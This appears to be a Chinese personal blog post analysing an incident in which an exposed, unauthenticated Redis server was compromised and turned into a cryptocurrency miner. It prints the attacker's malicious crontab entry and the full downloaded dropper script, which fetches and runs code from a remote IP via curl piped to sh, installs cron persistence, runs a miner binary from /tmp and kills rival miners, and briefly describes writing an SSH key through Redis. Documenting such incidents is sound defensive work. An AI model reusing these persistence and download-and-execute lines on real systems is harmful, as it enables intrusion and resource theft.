遥远的星星

记录一次由Redis漏洞引起的服务器遭遇入侵事件

2017-11-01

情况概述:

服务器CPU长时间100%占用率,带宽用尽,服务器各种服务启动后自动关闭。阿里云提示有挖矿进程,提示发起DDOS攻击。

日志分析:

1
2
3
4
Oct 30 03:50:02 dsdsaa  crond: sendmail: fatal: parameter inet_interfaces: no local interface found for ::1
Oct 30 03:55:01 dsdsaa systemd: Started Session 447 of user root.
Oct 30 03:55:01 dsdsaa systemd: Starting Session 447 of user root.
Oct 30 03:55:02 dsdsaa crond: sendmail: fatal: parameter inet_interfaces: no local interface found for ::1

每隔5分钟,系统会自动执行任务计划,而且有mail发送的程序。所以查看crondtabs –l下的所有任务计划,发现如下:

1
*/5  *  *  *  * curl –fssl http://218.248.40.228:8443/i.sh?6  | sh

根据地址,果断下载下攻击脚本进行分析如下。

攻击代码分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
//重定义了系统全局变量
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/root
//向ROOT用户添加任务计划,每5分钟自动从远程服务下载木马脚本并执行
mkdir -p /var/spool/cron/crontabs//创建计划任务目录,并写入执行脚本
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/crontabs/root

//如果没有找到/tmp/ddg.2011文件,则自动从远程服务器下载,并赋予执行权限
if [ ! -f "/tmp/ddg.2011" ]; then
curl -fsSL http://218.248.40.228:8443/2011/ddg.$(uname -m) -o /tmp/ddg.2011
//下载对应该系统版本和cpu和木马程序(二进制文件)
fi
chmod +x /tmp/ddg.2011 && /tmp/ddg.2011


#if [ ! -f "/tmp/ss2480.2" ]; then
#curl -fsSL http://218.248.40.228:8443/ss2480.2 -o /tmp/ss2480.2
#fi
#chmod +x /tmp/ss2480.2 && /tmp/ss2480.2
//查找以下进程并结束运行
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ss22522.1 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ss22522.2 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1010 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1021 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2001 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2003 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2004 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2005 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
//挖矿进程的守护进程,默认注释,需要时会自动结束木马进程。
#ps auxf | grep -v grep | grep ddg.2011 || rm -rf /tmp/ddg.2011

漏洞清理:

百度下,发现是由redis无验证漏洞引起的,作者认为redis一般运行在沙盒中,所以Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。
修复建议:
自行百度。

到此入侵事件基本解决。建议大家布置相关服务时,首先了解其运行机制和安全规则,再行布置到服务器,或由网络管理员处理。

Tags: LINUX